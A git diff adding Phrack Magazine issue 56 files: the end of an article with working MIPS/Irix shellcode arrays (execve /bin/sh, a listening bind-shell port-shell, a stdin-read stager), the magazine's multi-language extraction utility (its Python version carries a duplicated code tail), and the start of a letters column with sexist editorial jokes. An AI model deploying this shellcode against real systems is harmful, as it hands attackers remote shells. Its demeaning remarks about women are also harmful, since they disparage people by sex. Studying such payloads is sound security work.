+size.  At first try to find replacements for instruction blocks, where more
+then one instruction is used to do one thing.  Always take a look at the
+current register content and make use of return values or previously loaded
+values.  Sometimes reordering helps you to avoid jumps.
+
+
+----|  Example shellcode
+
+All the shellcodes have been tested on the following systems, (thanks to vax,
+oxigen, zap and hendy):
+
+R4000/6.2, R4000/6.5, R4400/5.3, R4400/6.2, R4600/5.3, R5000/6.5 and
+R10000/6.4.
+
+<++> p56/MIPS-shellcode/sh_execve.h !4959db03
+/* 68 byte MIPS/Irix PIC execve shellcode. -scut/teso
+ */
+unsigned long int shellcode[] = {
+		0xafa0fffc,	/* sw		$zero, -4($sp)		*/
+		0x24067350,	/* li		$a2, 0x7350		*/
+/* dpatch: */	0x04d0ffff,	/* bltzal	$a2, dpatch		*/
+		0x8fa6fffc,	/* lw		$a2, -4($sp)		*/
+		/* a2 = (char **) envp = NULL */
+
+		0x240fffcb,	/* li		$t7, -53		*/
+		0x01e07827,	/* nor		$t7, $t7, $zero		*/
+		0x03eff821,	/* addu		$ra, $ra, $t7		*/
+
+		/* a0 = (char *) pathname */
+		0x23e4fff8,	/* addi		$a0, $ra, -8		*/
+
+		/* fix 0x42 dummy byte in pathname to shell */
+		0x8fedfffc,	/* lw		$t5, -4($ra)		*/
+		0x25adffbe,	/* addiu	$t5, $t5, -66		*/
+		0xafedfffc,	/* sw		$t5, -4($ra)		*/
+
+		/* a1 = (char **) argv */
+		0xafa4fff8,	/* sw		$a0, -8($sp)		*/
+		0x27a5fff8,	/* addiu	$a1, $sp, -8		*/
+
+		0x24020423,	/* li		$v0, 1059 (SYS_execve)	*/
+		0x0101010c,	/* syscall				*/
+		0x2f62696e,	/* .ascii	"/bin"			*/
+		0x2f736842,	/* .ascii	"/sh", .byte 0xdummy	*/
+};
+<-->
+<++> p56/MIPS-shellcode/shc_portshell-listener.h !db48e22a
+/* 364 byte MIPS/Irix PIC listening portshell shellcode. -scut/teso
+ */
+unsigned long int shellcode[] = {
+		0x2416fffd,	/* li		$s6, -3			*/
+		0x02c07027,	/* nor		$t6, $s6, $zero		*/
+		0x01ce2025,	/* or		$a0, $t6, $t6		*/
+		0x01ce2825,	/* or		$a1, $t6, $t6		*/
+		0x240efff9,	/* li		$t6, -7			*/
+		0x01c03027,	/* nor		$a2, $t6, $zero		*/
+		0x24020453,	/* li		$v0, 1107 (socket)	*/
+		0x0101010c,	/* syscall				*/
+		0x240f7350,	/* li		$t7, 0x7350 (nop)	*/
+
+		0x3050ffff,	/* andi		$s0, $v0, 0xffff	*/
+		0x280d0101,	/* slti		$t5, $zero, 0x0101	*/
+		0x240effee,	/* li		$t6, -18		*/
+		0x01c07027,	/* nor		$t6, $t6, $zero		*/
+		0x01cd6804,	/* sllv		$t5, $t5, $t6		*/
+		0x240e7350,	/* li		$t6, 0x7350 (port)	*/
+		0x01ae6825,	/* or		$t5, $t5, $t6		*/
+		0xafadfff0,	/* sw		$t5, -16($sp)		*/
+		0xafa0fff4,	/* sw		$zero, -12($sp)		*/
+		0xafa0fff8,	/* sw		$zero, -8($sp)		*/
+		0xafa0fffc,	/* sw		$zero, -4($sp)		*/
+		0x02102025,	/* or		$a0, $s0, $s0		*/
+		0x240effef,	/* li		$t6, -17		*/
+		0x01c03027,	/* nor		$a2, $t6, $zero		*/
+		0x03a62823,	/* subu		$a1, $sp, $a2		*/
+		0x24020442,	/* li		$v0, 1090 (bind)	*/
+		0x0101010c,	/* syscall				*/
+		0x240f7350,	/* li		$t7, 0x7350 (nop)	*/
+
+		0x02102025,	/* or		$a0, $s0, $s0		*/
+		0x24050101,	/* li		$a1, 0x0101		*/
+		0x24020448,	/* li		$v0, 1096 (listen)	*/
+		0x0101010c,	/* syscall				*/
+		0x240f7350,	/* li		$t7, 0x7350 (nop)	*/
+
+		0x02102025,	/* or		$a0, $s0, $s0		*/
+		0x27a5fff0,	/* addiu	$a1, $sp, -16		*/
+		0x240dffef,	/* li		$t5, -17		*/
+		0x01a06827,	/* nor		$t5, $t5, $zero		*/
+		0xafadffec,	/* sw		$t5, -20($sp)		*/
+		0x27a6ffec,	/* addiu	$a2, $sp, -20		*/
+		0x24020441,	/* li		$v0, 1089 (accept)	*/
+		0x0101010c,	/* syscall				*/
+		0x240f7350,	/* li		$t7, 0x7350 (nop)	*/
+		0x3057ffff,	/* andi		$s7, $v0, 0xffff	*/
+
+		0x2804ffff,	/* slti		$a0, $zero, -1		*/
+		0x240203ee,	/* li		$v0, 1006 (close)	*/
+		0x0101010c,	/* syscall				*/
+		0x240f7350,	/* li		$t7, 0x7350 (nop)	*/
+
+		0x02f72025,	/* or		$a0, $s7, $s7		*/
+		0x2805ffff,	/* slti		$a1, $zero, -1		*/
+		0x2806ffff,	/* slti		$a2, $zero, -1		*/
+		0x24020426,	/* li		$v0, 1062 (fcntl)	*/
+		0x0101010c,	/* syscall				*/
+		0x240f7350,	/* li		$t7, 0x7350 (nop)	*/
+
+		0x28040101,	/* slti		$a0, $zero, 0x0101	*/
+		0x240203ee,	/* li		$v0, 1006 (close)	*/
+		0x0101010c,	/* syscall				*/
+		0x240f7350,	/* li		$t7, 0x7350 (nop)	*/
+
+		0x02f72025,	/* or		$a0, $s7, $s7		*/
+		0x2805ffff,	/* slti		$a1, $zero, -1		*/
+		0x28060101,	/* slti		$a2, $zero, 0x0101	*/
+		0x24020426,	/* li		$v0, 1062 (fcntl)	*/
+		0x0101010c,	/* syscall				*/
+		0x240f7350,	/* li		$t7, 0x7350		*/
+
+		0x02c02027,	/* nor		$a0, $s6, $zero		*/
+		0x240203ee,	/* li		$v0, 1006 (close)	*/
+		0x0101010c,	/* syscall				*/
+		0x240f7350,	/* li		$t7, 0x7350 (nop)	*/
+
+		0x02f72025,	/* or		$a0, $s7, $s7		*/
+		0x2805ffff,	/* slti		$a1, $zero, -1		*/
+		0x02c03027,	/* nor		$a2, $s6, $zero		*/
+		0x24020426,	/* li		$v0, 1062 (fcntl)	*/
+		0x0101010c,	/* syscall				*/
+		0x240f7350,	/* li		$t7, 0x7350 (nop)	*/
+
+		0xafa0fffc,	/* sw		$zero, -4($sp)		*/
+		0x24068cb0,	/* li		$a2, -29520		*/
+		0x04d0ffff,	/* bltzal	$a2, pc-4		*/
+		0x8fa6fffc,	/* lw		$a2, -4($sp)		*/
+		0x240fffc7,	/* li		$t7, -57		*/
+		0x01e07827,	/* nor		$t7, $t7, $zero		*/
+		0x03eff821,	/* addu		$ra, $ra, $t7		*/
+		0x23e4fff8,	/* addi		$a0, $ra, -8		*/
+		0x8fedfffc,	/* lw		$t5, -4($ra)		*/
+		0x25adffbe,	/* addiu	$t5, $t5, -66		*/
+		0xafedfffc,	/* sw		$t5, -4($ra)		*/
+		0xafa4fff8,	/* sw		$a0, -8($sp)		*/
+		0x27a5fff8,	/* addiu	$a1, $sp, -8		*/
+		0x24020423,	/* li		$v0, 1059 (execve)	*/
+		0x0101010c,	/* syscall				*/
+		0x240f7350,	/* li		$t7, 0x7350 (nop)	*/
+		0x2f62696e,	/* .ascii	"/bin"			*/
+		0x2f736842,	/* .ascii	"/sh", .byte 0xdummy	*/
+};
+<-->
+<++> p56/MIPS-shellcode/shc_read.h !1996c2bb
+/* 40 byte MIPS/Irix PIC stdin-read shellcode. -scut/teso
+ */
+unsigned long int shellcode[] = {
+		0x24048cb0,	/* li		$a0, -0x7350		*/
+/* dpatch: */	0x0490ffff,	/* bltzal	$a0, dpatch		*/
+		0x2804ffff,	/* slti		$a0, $zero, -1		*/
+		0x240fffe3,	/* li		$t7, -29		*/
+		0x01e07827,	/* nor		$t7, $t7, $zero		*/
+		0x03ef2821,	/* addu		$a1, $ra, $t7		*/
+		0x24060201,	/* li		$a2, 0x0201 (513 bytes)	*/
+		0x240203eb,	/* li		$v0, SYS_read		*/
+		0x0101010c,	/* syscall				*/
+		0x24187350,	/* li		$t8, 0x7350 (nop)	*/
+};
+<-->
+
+
+----|  References
+
+For further information you may want to consult this excellent references:
+
+ [1] See MIPS Run
+     Dominic Sweetman, Morgan Kaufmann Publishers
+     ISBN 1-55860-410-3
+
+ [2] MIPSPro Assembly Language Programmer's Guide - Volume 1/2
+     Document Number 007-2418-001
+     http://www.mips.com/ and http://www.sgi.com/
+
+|EOF|-------------------------------------------------------------------------|
+
diff --git a/phrack56/16.txt b/phrack56/16.txt
new file mode 100644
index 0000000..e851426
--- /dev/null
+++ b/phrack56/16.txt
@@ -0,0 +1,753 @@
+                      - P H R A C K   M A G A Z I N E -
+
+                            Volume 0xa Issue 0x38
+                                  05.01.2000
+                                  0x10[0x10]
+
+|------------- P H R A C K   E X T R A C T I O N   U T I L I T Y -------------|
+|-----------------------------------------------------------------------------|
+|------------------------------- phrack staff --------------------------------|
+
+The Phrack Magazine Extraction Utility, first appearing in P50, is a convenient
+way to extract code from textual ASCII articles.  It preserves readability and
+7-bit clean ASCII codes.  As long as there are no extraneous "<++>" or <-->" in
+the article, everything runs swimmingly.
+
+|-----------------------------------------------------------------------------|
+
+<++> p56/EX/PMEU/extract4.c !8e2bebc6
+
+/*
+ *  extract.c by Phrack Staff and sirsyko
+ *
+ *  Copyright (c) 1997 - 2000 Phrack Magazine
+ *
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ *
+ *  extract.c
+ *  Extracts textfiles from a specially tagged flatfile into a hierarchical 
+ *  directory structure.  Use to extract source code from any of the articles 
+ *  in Phrack Magazine (first appeared in Phrack 50).
+ *
+ *  Extraction tags are of the form:
+ *
+ *  host:~> cat testfile
+ *  irrelevant file contents
+ *  <++> path_and_filename1 !CRC32
+ *  file contents
+ *  <-->
+ *  irrelevant file contents
+ *  <++> path_and_filename2 !CRC32
+ *  file contents
+ *  <-->
+ *  irrelevant file contents
+ *  <++> path_and_filenamen !CRC32
+ *  file contents
+ *  <-->
+ *  irrelevant file contents
+ *  EOF
+ *
+ *  The `!CRC` is optional.  The filename is not.  To generate crc32 values 
+ *  for your files, simply give them a dummy value initially.  The program
+ *  will attempt to verify the crc and fail, dumping the expected crc value.
+ *  Use that one.  i.e.:
+ *
+ *  host:~> cat testfile
+ *  this text is ignored by the program
+ *  <++> testarooni !12345678
+ *  text to extract into a file named testarooni
+ *  as is this text
+ *  <--> 
+ *
+ *  host:~> ./extract testfile
+ *  Opened testfile
+ *   - Extracting testarooni
+ *   crc32 failed (12345678 != 4a298f18)
+ *  Extracted 1 file(s).  
+ *
+ *  You would use `4a298f18` as your crc value.
+ *
+ *  Compilation:
+ *  gcc -o extract extract.c
+ *  
+ *  ./extract file1 file2 ... filen
+ */
+
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <string.h>
+#include <dirent.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <errno.h>
+
+#define VERSION         "7niner.20000430 revsion q"
+
+#define BEGIN_TAG       "<++> "
+#define END_TAG         "<-->"
+#define BT_SIZE         strlen(BEGIN_TAG)
+#define ET_SIZE         strlen(END_TAG)
+#define EX_DO_CHECKS    0x01
+#define EX_QUIET        0x02
+
+struct f_name
+{
+    u_char name[256];
+    struct f_name *next;
+};
+
+unsigned long crcTable[256];
+
+
+void crcgen() 
+{
+    unsigned long crc, poly;
+    int i, j;
+    poly = 0xEDB88320L;
+    for (i = 0; i < 256; i++)
+    {
+        crc = i;
+        for (j = 8; j > 0; j--)
+        {
+            if (crc & 1)
+            {
+                crc = (crc >> 1) ^ poly;
+            } 
+            else
+            {
+                crc >>= 1;
+            }
+        }
+        crcTable[i] = crc;
+    }
+}
+
+        
+unsigned long check_crc(FILE *fp)
+{
+    register unsigned long crc;
+    int c;
+
+    crc = 0xFFFFFFFF;
+    while( (c = getc(fp)) != EOF )
+    {
+         crc = ((crc >> 8) & 0x00FFFFFF) ^ crcTable[(crc ^ c) & 0xFF];
+    }
+ 
+    if (fseek(fp, 0, SEEK_SET) == -1)
+    {
+        perror("fseek");
+        exit(EXIT_FAILURE);
+    }
+
+    return (crc ^ 0xFFFFFFFF);
+}
+
+
+int
+main(int argc, char **argv)
+{ 
+    char *name;
+    u_char b[256], *bp, *fn, flags;
+    int i, j = 0, h_c = 0, c;
+    unsigned long crc = 0, crc_f = 0;
+    FILE *in_p, *out_p = NULL;
+    struct f_name *fn_p = NULL, *head = NULL, *tmp = NULL;
+
+    while ((c = getopt(argc, argv, "cqv")) != EOF)
+    {
+        switch (c)
+        {
+            case 'c':
+                flags |= EX_DO_CHECKS;
+                break;
+            case 'q':
+                flags |= EX_QUIET;
+                break;
+            case 'v':
+                fprintf(stderr, "Extract version: %s\n", VERSION);
+                exit(EXIT_SUCCESS);
+        }
+    }
+    c = argc - optind;
+
+    if (c < 2)
+    {
+        fprintf(stderr, "Usage: %s [-cqv] file1 file2 ... filen\n", argv[0]);
+        exit(0); 
+    }
+
+    /*
+     *  Fill the f_name list with all the files on the commandline (ignoring
+     *  argv[0] which is this executable).  This includes globs.
+     */
+    for (i = 1; (fn = argv[i++]); )
+    {
+        if (!head)
+        {
+            if (!(head = (struct f_name *)malloc(sizeof(struct f_name))))
+            {
+                perror("malloc");
+                exit(EXIT_FAILURE);
+            }
+            strncpy(head->name, fn, sizeof(head->name));
+            head->next = NULL;
+            fn_p = head;
+        }
+        else
+        {
+            if (!(fn_p->next = (struct f_name *)malloc(sizeof(struct f_name))))
+            {
+                perror("malloc");
+                exit(EXIT_FAILURE);
+            }
+            fn_p = fn_p->next;
+            strncpy(fn_p->name, fn, sizeof(fn_p->name));
+            fn_p->next = NULL;
+        }
+    }
+    /*
+     *  Sentry node.
+     */
+    if (!(fn_p->next = (struct f_name *)malloc(sizeof(struct f_name))))
+    {
+        perror("malloc");
+        exit(EXIT_FAILURE);
+     }
+    fn_p = fn_p->next;
+    fn_p->next = NULL;
+
+    /*
+     *  Check each file in the f_name list for extraction tags.
+     */
+    for (fn_p = head; fn_p->next; )
+    {
+        if (!strcmp(fn_p->name, "-"))
+        {
+            in_p = stdin;
+            name = "stdin";
+        }
+        else if (!(in_p = fopen(fn_p->name, "r")))
+        {
+            fprintf(stderr, "Could not open input file %s.\n", fn_p->name);
+            fn_p = fn_p->next;
+	    continue;
+        }
+        else
+        {
+            name = fn_p->name;
+        }
+
+        if (!(flags & EX_QUIET))
+        {
+            fprintf(stderr, "Scanning %s...\n", fn_p->name);
+        }
+        crcgen();
+        while (fgets(b, 256, in_p))
+        { 
+            if (!strncmp(b, BEGIN_TAG, BT_SIZE))
+            {
+	        b[strlen(b) - 1] = 0;           /* Now we have a string. */
+                j++;
+
+                crc = 0;
+                crc_f = 0;
+                if ((bp = strchr(b + BT_SIZE + 1, '/')))
+                {
+                    while (bp)
+                    {
+		        *bp = 0;
+                        if (mkdir(b + BT_SIZE, 0700) == -1 && errno != EEXIST)
+                        {
+                            perror("mkdir");
+                            exit(EXIT_FAILURE);
+                        }
+                        *bp = '/';
+		        bp = strchr(bp + 1, '/'); 
+		    }
+                }
+
+                if ((bp = strchr(b, '!')))
+                {
+                    crc_f = 
+                        strtoul((b + (strlen(b) - strlen(bp)) + 1), NULL, 16);
+                   b[strlen(b) - strlen(bp) - 1 ] = 0;
+                   h_c = 1;
+                }
+                else
+                {
+                    h_c = 0;
+                }
+                if ((out_p = fopen(b + BT_SIZE, "wb+")))
+                {
+                    fprintf(stderr, ". Extracting %s\n", b + BT_SIZE);
+                }
+                else
+                {
+        	    printf(". Could not extract anything from '%s'.\n",
+                        b + BT_SIZE);
+        	    continue;
+                }
+            }
+            else if (!strncmp (b, END_TAG, ET_SIZE))
+            {
+                if (out_p)
+                {
+                    if (h_c == 1)
+                    {
+                        if (fseek(out_p, 0l, 0) == -1)
+                        {
+                            perror("fseek");
+                            exit(EXIT_FAILURE);
+                        }
+                        crc = check_crc(out_p);
+                        if (crc == crc_f && !(flags & EX_QUIET))
+                        {
+                            fprintf(stderr, ". CRC32 verified (%08lx)\n", crc);
+                        }
+                        else
+                        {
+                            if (!(flags & EX_QUIET))
+                            {
+                                fprintf(stderr, ". CRC32 failed (%08lx != %08lx)\n",
+                                        crc_f, crc);
+                            }
+                        }
+                    }
+                    fclose(out_p);
+                }
+	        else
+                {
+	            fprintf(stderr, ". `%s` had bad tags.\n", fn_p->name);
+		    continue;
+	        }
+            }
+            else if (out_p)
+            {
+                fputs(b, out_p);
+            }
+        }
+        if (in_p != stdin)
+        {
+            fclose(in_p);
+        }
+        tmp = fn_p;
+        fn_p = fn_p->next;
+        free(tmp);
+    }
+    if (!j)
+    {
+        printf("No extraction tags found in list.\n");
+    }
+    else
+    {
+        printf("Extracted %d file(s).\n", j);
+    }
+    return (0);
+}
+/* EOF */
+<-->
+<++> p56/EX/PMEU/extract.pl !1a19d427
+# Daos <daos@nym.alias.net>
+#!/bin/sh -- # -*- perl -*- -n
+eval 'exec perl $0 -S ${1+"$@"}' if 0;
+
+$opening=0;
+
+if (/^\<\+\+\>/) {$curfile = substr($_ , 5); $opening=1;};
+if (/^\<\-\-\>/) {close ct_ex; $opened=0;}; 
+if ($opening) {                        
+        chop $curfile;                 
+        $sex_dir= substr( $curfile, 0, ((rindex($curfile,'/'))) ) if ($curfile =~ m/\//);
+        eval {mkdir $sex_dir, "0777";}; 
+        open(ct_ex,">$curfile"); 
+        print "Attempting extraction of $curfile\n";
+        $opened=1; 
+}
+if ($opened && !$opening) {print ct_ex $_}; 
+<-->
+
+<++> p56/EX/PMEU/extract.awk !26522c51
+#!/usr/bin/awk -f
+#
+# Yet Another Extraction Script
+# - <sirsyko>
+#
+/^\<\+\+\>/ {
+        ind = 1
+        File = $2
+        split ($2, dirs, "/")
+        Dir="."
+        while ( dirs[ind+1] ) {
+                Dir=Dir"/"dirs[ind]
+                system ("mkdir " Dir" 2>/dev/null")
+                ++ind
+        }
+        next
+}
+/^\<\-\-\>/ {
+        File = ""
+        next
+}
+File { print >> File }
+<-->
+<++> p56/EX/PMEU/extract.sh !a81a2320
+#!/bin/sh
+# exctract.sh : Written 9/2/1997 for the Phrack Staff by <sirsyko>
+#
+# note, this file will create all directories relative to the current directory
+# originally a bug, I've now upgraded it to a feature since I dont want to deal
+# with the leading / (besides, you dont want hackers giving you full pathnames
+# anyway, now do you :)
+# Hopefully this will demonstrate another useful aspect of IFS other than 
+# haxoring rewt
+#
+# Usage: ./extract.sh <filename>
+
+cat $* | (
+Working=1
+while [ $Working ];
+do
+        OLDIFS1="$IFS"
+        IFS=
+        if read Line; then
+                IFS="$OLDIFS1"
+                set -- $Line
+                case "$1" in
+                "<++>") OLDIFS2="$IFS"
+                        IFS=/
+                        set -- $2
+                        IFS="$OLDIFS2"
+                        while [ $# -gt 1 ]; do
+                                File=${File:-"."}/$1
+                                if [ ! -d $File ]; then
+                                        echo "Making dir $File"
+                                        mkdir $File
+                                fi
+                                shift
+                        done                               
+                        File=${File:-"."}/$1
+                        echo "Storing data in $File"
+                ;;
+                "<-->") if [ "x$File" != "x" ]; then
+                                unset File
+                        fi ;;
+                *)      if [ "x$File" != "x" ]; then
+                                        IFS=
+                                        echo "$Line" >> $File
+                                        IFS="$OLDIFS1"
+                        fi
+                ;;
+                esac
+                IFS="$OLDIFS1"
+        else
+                echo "End of file"
+                unset Working
+        fi
+done
+)                                                                    
+<-->
+<++> p56/EX/PMEU/extract.py !83f65f60
+#! /bin/env python
+# extract.py    Timmy 2tone <_spoon_@usa.net>
+
+import sys, string, getopt, os
+
+class Datasink:
+    """Looks like a file, but doesn't do anything."""
+    def write(self, data): pass
+    def close(self): pass
+
+def extract(input, verbose = 1):
+    """Read a file from input until we find the end token."""
+
+    if type(input) == type('string'):
+        fname = input
+        try: input = open(fname)
+        except IOError, (errno, why):
+            print "Can't open %s: %s" % (fname, why)
+            return errno
+    else:
+        fname = '<file descriptor %d>' % input.fileno()
+
+    inside_embedded_file = 0
+    linecount = 0
+    line = input.readline()
+    while line:
+
+        if not inside_embedded_file and line[:4] == '<++>':
+
+            inside_embedded_file = 1
+            linecount = 0
+
+            filename = string.strip(line[4:])
+            if mkdirs_if_any(filename) != 0:
+                pass
+
+            try: output = open(filename, 'w')
+            except IOError, (errno, why):
+                print "Can't open %s: %s; skipping file" % (filename, why)
+                output = Datasink()
+                continue
+
+            if verbose:
+                print 'Extracting embedded file %s from %s...' % (filename,
+                                                                  fname),
+
+        elif inside_embedded_file and line[:4] == '<-->':
+            output.close()
+            inside_embedded_file = 0
+            if verbose and not isinstance(output, Datasink):
+                print '[%d lines]' % linecount
+
+        elif inside_embedded_file:
+            output.write(line)
+
+        # Else keep looking for a start token.
+        line = input.readline()
+        linecount = linecount + 1
+
+def mkdirs_if_any(filename, verbose = 1):
+    """Check for existance of /'s in filename, and make directories."""
+
+    path, file = os.path.split(filename)
+    if not path: return
+
+    errno = 0
+    start = os.getcwd()
+    components = string.split(path, os.sep)
+    for dir in components:
+        if not os.path.exists(dir):
+            try:
+                os.mkdir(dir)
+                if verbose: print 'Created directory', path
+
+            except os.error, (errno, why):
+                print "Can't make directory %s: %s" % (dir, why)
+                break
+
+        try: os.chdir(dir)
+        except os.error, (errno, why):
+            print "Can't cd to directory %s: %s" % (dir, why)
+            break
+
+    os.chdir(start)
+    return errno
+
+def usage():
+    """Blah."""
+    die('Usage: extract.py [-V] filename [filename...]')
+
+def main():
+    try: optlist, args = getopt.getopt(sys.argv[1:], 'V')
+    except getopt.error, why: usage()
+    if len(args) <= 0: usage()
+
+    if ('-V', '') in optlist: verbose = 0
+    else: verbose = 1
+
+    for filename in args:
+        if verbose: print 'Opening source file', filename + '...'
+        extract(filename, verbose)
+
+def db(filename = 'P51-11'):
+    """Run this script in the python debugger."""
+    import pdb
+    sys.argv[1:] = ['-v', filename]
+    pdb.run('extract.main()')
+
+def die(msg, errcode = 1):
+    print msg
+    sys.exit(errcode)
+
+if __name__ == '__main__':
+    try: main()
+    except KeyboardInterrupt: pass
+
+
+    except getopt.error, why: usage()
+    if len(args) <= 0: usage()
+
+    if ('-V', '') in optlist: verbose = 0
+    else: verbose = 1
+
+    for filename in args:
+        if verbose: print 'Opening source file', filename + '...'
+        extract(filename, verbose)
+
+def db(filename = 'P51-11'):
+    """Run this script in the python debugger."""
+    import pdb
+    sys.argv[1:] = [filename]
+    pdb.run('extract.main()')
+
+def die(msg, errcode = 1):
+    print msg
+    sys.exit(errcode)
+
+if __name__ == '__main__':
+    try: main()
+    except KeyboardInterrupt: pass              # No messy traceback.
+<-->
+<++> p56/EX/PMEU/extract-win.c !e519375d
+/***************************************************************************/
+/* WinExtract                                                              */
+/*                                                                         */
+/* Written by Fotonik <fotonik@game-master.com>.                           */
+/*                                                                         */
+/* Coding of WinExtract started on 22aug98.                                */
+/*                                                                         */
+/* This version (1.0) was last modified on 22aug98.                        */
+/*                                                                         */
+/* This is a Win32 program to extract text files from a specially tagged   */
+/* flat file into a hierarchical directory structure.  Use to extract      */
+/* source code from articles in Phrack Magazine.  The latest version of    */
+/* this program (both source and executable codes) can be found on my      */
+/* website:  http://www.altern.com/fotonik                                 */
+/***************************************************************************/
+
+
+#include <stdio.h>
+#include <string.h>
+#include <windows.h>
+
+
+void PowerCreateDirectory(char *DirectoryName);
+
+
+int WINAPI WinMain(HINSTANCE hThisInst, HINSTANCE hPrevInst,
+                   LPSTR lpszArgs, int nWinMode)
+{
+OPENFILENAME OpenFile; /* Structure for Open common dialog box */
+char InFileName[256]="";
+char OutFileName[256];
+char Title[]="WinExtract - Choose a file to extract files from.";
+FILE *InFile;
+FILE *OutFile;
+char Line[256];
+char DirName[256];
+int FileExtracted=0;   /* Flag used to determine if at least one file was */
+int i;                 /* extracted */
+
+ZeroMemory(&OpenFile, sizeof(OPENFILENAME));
+OpenFile.lStructSize=sizeof(OPENFILENAME);
+OpenFile.hwndOwner=HWND_DESKTOP;
+OpenFile.hInstance=hThisInst;
+OpenFile.lpstrFile=InFileName;
+OpenFile.nMaxFile=sizeof(InFileName)-1;
+OpenFile.lpstrTitle=Title;
+OpenFile.Flags=OFN_FILEMUSTEXIST | OFN_HIDEREADONLY;
+
+if(GetOpenFileName(&OpenFile))
+   {
+   if((InFile=fopen(InFileName,"r"))==NULL)
+      {
+      MessageBox(NULL,"Could not open file.",NULL,MB_OK);
+      return 0;
+      }
+
+   /* If we got here, InFile is opened. */
+   while(fgets(Line,256,InFile))
+      {
+      if(!strncmp(Line,"<++> ",5)) /* If line begins with "<++> " */
+         {
+         Line[strlen(Line)-1]='\0';
+         strcpy(OutFileName,Line+5);
+
+         /* Check if a dir has to be created and create one if necessary */
+         for(i=strlen(OutFileName)-1;i>=0;i--)
+            {
+            if((OutFileName[i]=='\\')||(OutFileName[i]=='/'))
+               {
+               strncpy(DirName,OutFileName,i);
+               DirName[i]='\0';
+               PowerCreateDirectory(DirName);
+               break;
+               }
+            }
+
+         if((OutFile=fopen(OutFileName,"w"))==NULL)
+            {
+            MessageBox(NULL,"Could not create file.",NULL,MB_OK);
+            fclose(InFile);
+            return 0;
+            }
+
+         /* If we got here, OutFile can be written to */
+         while(fgets(Line,256,InFile))
+            {
+            if(strncmp(Line,"<-->",4)) /* If line doesn't begin w/ "<-->" */
+               {
+               fputs(Line, OutFile);
+               }
+            else
+               {
+               break;
+               }
+            }
+         fclose(OutFile);
+         FileExtracted=1;
+         }
+      }
+   fclose(InFile);
+   if(FileExtracted)
+      {
+      MessageBox(NULL,"Extraction sucessful.","WinExtract",MB_OK);
+      }
+   else
+      {
+      MessageBox(NULL,"Nothing to extract.","Warning",MB_OK);
+      }
+   }
+   return 1;
+}
+
+
+/* PowerCreateDirectory is a function that creates directories that are */
+/* down more than one yet unexisting directory levels.  (e.g. c:\1\2\3) */
+void PowerCreateDirectory(char *DirectoryName)
+{
+int i;
+int DirNameLength=strlen(DirectoryName);
+char DirToBeCreated[256];
+
+for(i=1;i<DirNameLength;i++) /* i starts at 1, because we never need to */
+   {                         /* create '/' */
+   if((DirectoryName[i]=='\\')||(DirectoryName[i]=='/')||
+      (i==DirNameLength-1))
+      {
+      strncpy(DirToBeCreated,DirectoryName,i+1);
+      DirToBeCreated[i+1]='\0';
+      CreateDirectory(DirToBeCreated,NULL);
+      }
+   }
+}
+<-->
+
+
+|EOF|-------------------------------------------------------------------------|
diff --git a/phrack56/2.txt b/phrack56/2.txt
new file mode 100644
index 0000000..648706f
--- /dev/null
+++ b/phrack56/2.txt
@@ -0,0 +1,1392 @@
+                      - P H R A C K   M A G A Z I N E -
+
+                            Volume 0xa Issue 0x38
+                                  05.01.2000
+                                  0x02[0x10]
+
+|------------------------------ L O O P  B A C K -----------------------------|
+|-----------------------------------------------------------------------------|
+|-------------------------------- phrack staff -------------------------------|
+
+Phrack Loopback is your chance to write to the Phrack staff with your
+comments, questions, or whatever.  The responses are generally written by the
+editor, except where noted.  The actual letters are perhaps edited for format,
+but generally not for grammar and/or spelling.  We try not to correct the
+vernacular, as it often adds a colorful -even colloquial- perspective to the
+letter in question.
+
+|0x01|------------------------------------------------------------------------|
+
+Hackesses...
+by MiStReSS DiVA
+
+My name is MiStReSS DiVA...and I am a hackess...
+
+    [ Who said what now?  A hackess?  Is that some sort of delicious pastry
+      treat? ]
+
+"Girls can't hack...,"  I've heard this more times than not
+
+    [ Hrm.  I usually hear "girls cant do such-and-such az good az guyz" or
+      "women shouldn't vote", or the ever popular "YOU WANT ANOTHER BLACK
+      EYE?  NO?  GOOD!  GET BACK IN THERE AND MAKE ME A PIE." ]
+
+at hackers conventions and the like.  Well, I have some news for everyone;
+
+    [ They're bringing back Perfect Strangers? ]
+
+There are women hackers, and our numbers are rising.
+
+    [ Oh.  Damn.  I really miss Balki. ]
+
+Let's think about it for a moment-Women have always taken second seat to
+men, especially in the computer industry and business.
+
+    [ There'z a reason for this...  No..  Hrm.  There really isn't. ]
+
+Over 75% of jobs in computer industries and taken by men.
+
+    [ How do you think we feel?  Over 75% of the jobs in the baking and sewing
+      industries are taken by women! ]
+
+So, it's no surprise that there aren't many women in hacking.  There's the
+issue of some hacking activities being illegal.
+
+    [ Don't discount the major issue that hacking activities have nothing to
+      do with makeup, shopping at strip mallz or gold digging! ]
+
+Many women want to stay as far away from situations like that as possible.  I
+know many girls who don't even drink or smoke illegally, no less break into a
+UNIX server, let alone know what one is.
+
+    [ I bet these are the same chickz who turn me down when I ask them out.
+      Course, all chickz turn me down when I ask them out so I guess it'z a
+      moot point. :( ]
+
